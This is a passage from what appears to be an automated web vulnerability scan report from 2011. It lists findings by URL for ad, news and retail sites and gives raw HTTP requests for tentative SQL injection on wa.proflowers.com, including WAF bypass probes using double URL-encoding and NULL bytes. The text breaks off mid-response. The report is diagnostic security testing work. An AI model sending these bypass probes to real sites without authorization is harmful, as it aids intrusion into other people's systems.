19.32. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

19.33. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

19.34. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

19.35. http://www.personalcreations.com/radioDefault.aspx

19.36. http://www.personalcreations.com/sitemap.aspx

19.37. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

19.38. http://www.reuters.com/assets/commentsChild

19.39. http://www.reuters.com/assets/newsFlash

19.40. http://www.sacbee.com/notfound/

19.41. http://www.scribd.com/embeds/63688924/content

19.42. http://www.scribd.com/embeds/63688924/content_inner

19.43. http://www.sprint.com/index_c.html

19.44. https://www.sprint.net/performance/

19.45. http://www.und.com/sports/m-footbl/9873956

19.46. http://www.und.com/sports/m-footbl/9874134

19.47. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

19.48. http://www.youtube.com/embed/xXftjfC3b5o

20. TRACE method is enabled

20.1. http://bh.contextweb.com/

20.2. http://blogs.sacbee.com/

20.3. http://community.sprint.com/

20.4. http://image2.pubmatic.com/

20.5. http://imp.fetchback.com/

20.6. http://log.c12s.com/

20.7. http://m.xp1.ru4.com/

20.8. http://mi.adinterax.com/

20.9. http://optimized-by.rubiconproject.com/

20.10. http://r.openx.net/

20.11. http://rt.legolas-media.com/

20.12. http://sales.reuters.com/

20.13. http://tacoda.at.atwola.com/

20.14. http://www.sprint.com/

20.15. https://www.sprint.net/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/742697

21.2. http://blogs.sacbee.com/the_state_worker/

21.3. http://media.sacbee.com/static/styles/blog_styles.css

21.4. http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js

21.5. http://www.google.com/uds/Gfeeds

21.6. http://www.google.com/uds/Gfeeds

21.7. http://www.personalcreations.com/CustomerService-ContactUs.aspx

21.8. http://www.sacbee.com/notfound/

22. Private IP addresses disclosed

22.1. http://www.facebook.com/extern/login_status.php

22.2. http://www.facebook.com/extern/login_status.php

22.3. http://www.facebook.com/plugins/like.php

22.4. http://www.facebook.com/plugins/like.php

22.5. http://www.facebook.com/plugins/likebox.php

23. Robots.txt file

23.1. http://ad.afy11.net/ad

23.2. http://ad.turn.com/server/ads.js

23.3. http://ad.yieldmanager.com/pixel

23.4. http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62

23.5. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

23.6. http://b.scorecardresearch.com/b

23.7. http://c.betrad.com/surly.js

23.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

23.9. http://cdn.gigya.com/js/socialize.js

23.10. http://cdn.optmd.com/V2/89733/235451/index.html

23.11. http://cdn.turn.com/server/ddc.htm

23.12. http://ce.lijit.com/merge

23.13. http://cim.meebo.com/cim

23.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

23.15. http://community.sprint.com/baw/index.jspa

23.16. http://content.usatoday.com/communities/campusrivalry/topics

23.17. http://fonts1.scribdassets.com/static/4gen.css

23.18. http://fonts2.scribdassets.com/static/4gen_ie.css

23.19. http://fonts4.scribdassets.com/static/4gen.js

23.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

23.21. http://get.lingospot.com/arc/stay/

23.22. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

23.23. http://i.casalemedia.com/imp.gif

23.24. http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

23.25. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

23.26. http://imp.fetchback.com/serve/fb/adtag.js

23.27. http://jlinks.industrybrains.com/jsct

23.28. http://l.addthiscdn.com/live/t00/250lo.gif

23.29. http://m.xp1.ru4.com/activity

23.30. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

23.31. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

23.32. http://pixel.mathtag.com/sync

23.33. http://pixel.quantserve.com/pixel

23.34. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

23.35. http://r.casalemedia.com/rum

23.36. http://r.turn.com/r/beacon

23.37. http://rt.legolas-media.com/lgrt

23.38. http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf

23.39. http://s6.scribdassets.com/aggregated/css/base.css

23.40. http://s7.scribdassets.com/aggregated/css/web.css

23.41. http://sales.reuters.com/pitches/roughcuts/rc728x90.swf

23.42. http://static.lingospot.com/js/all.js

23.43. http://sync.mathtag.com/sync

23.44. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

23.45. http://tcr.tynt.com/javascripts/Tracer.js

23.46. http://trc.taboolasyndication.com/reuters/trc/2/json

23.47. http://turn.nexac.com/r/pu

23.48. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

23.49. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401

23.50. http://www.bizographics.com/collect/

23.51. http://www.facebook.com/plugins/like.php

23.52. http://www.google-analytics.com/__utm.gif

23.53. http://www.googleadservices.com/pagead/conversion/1031221371/

23.54. http://www.linkedin.com/analytics/

23.55. https://www.linkedin.com/secure/login

23.56. http://www.meebo.com/cim/sandbox.php

23.57. http://www.personalcreations.com/

23.58. http://www.publish2.com/newsgroups/state-worker.js

23.59. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

23.60. http://www.sacbee.com/notfound

23.61. http://www.scribd.com/embeds/63688924/content

23.62. http://www.sprint.com/index_c.html

23.63. https://www.sprint.net/performance

23.64. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

23.65. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

23.66. http://www.youtube.com/embed/xXftjfC3b5o

24. Cacheable HTTPS response

24.1. https://socialize.gigya.com/gs/bookmark.aspx

24.2. https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx

24.3. https://www.sprint.net/performance/

24.4. https://www.sprint.net/performance/gen_line_xml.php

24.5. https://www.sprint.net/performance/gen_pop_xml.php

25. HTML does not specify charset

25.1. http://a1128.g.akamai.net/favicon.ico

25.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

25.3. http://ad.doubleclick.net/adj/sacbee_cim/

25.4. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

25.5. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

25.6. http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json

25.7. http://graphics.cstv.com/store/.gif

25.8. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

25.9. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

25.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

25.11. http://view.atdmt.com/SPT/iview/194719689/direct/01

25.12. http://view.atdmt.com/SPT/iview/194719690/direct/01

25.13. http://view.atdmt.com/SPT/iview/194719691/direct/01

25.14. http://view.atdmt.com/SPT/iview/194719692/direct/01

25.15. http://view.atdmt.com/SPT/iview/194719693/direct/01

25.16. http://view.atdmt.com/SPT/iview/194719989/direct/01

25.17. http://view.atdmt.com/SPT/iview/194719990/direct/01

25.18. http://view.atdmt.com/SPT/iview/194719991/direct/01

25.19. http://view.atdmt.com/SPT/iview/194719992/direct/01

25.20. http://view.atdmt.com/SPT/iview/194719993/direct/01

25.21. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

25.22. http://w55c.net/ct/cms-2-frame.html

25.23. https://www.sprint.net/performance/gen_line_xml.php

25.24. https://www.sprint.net/performance/gen_pop_xml.php

25.25. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/adj/sacbee_cim/

26.2. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

26.3. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

26.4. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

26.5. http://imp.fetchback.com/serve/fb/adtag.js

26.6. http://js.www.reuters.com/recommend/re/fp

26.7. http://rma-api.gravity.com/v1/beacons/initialize

26.8. http://rt.disqus.com/forums/realtime-cached.js

26.9. http://rt.legolas-media.com/lgrt

26.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

26.11. http://trc.taboolasyndication.com/reuters/trc/2/json

26.12. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

26.13. http://www.facebook.com/extern/login_status.php

26.14. http://www.reuters.com/assets/breakingNews

26.15. http://www.reuters.com/assets/info

26.16. http://www.reuters.com/assets/searchIntercept

26.17. https://www.sprint.net/performance/gen_line_xml.php

26.18. https://www.sprint.net/performance/gen_pop_xml.php

27. Content type is not specified

27.1. http://rma-api.gravity.com/favicon.ico

27.2. http://www.meebo.com/cmd/btproviders

27.3. http://www.meebo.com/cmd/tc



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/proflodevelopment/1/H.22.1/s81099810544401 w
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Content-Length: 0
Content-Type: text/html


1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84142070419620

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
xserver: www650
Content-Length: 0
Content-Type: text/html


1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84476320391986

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
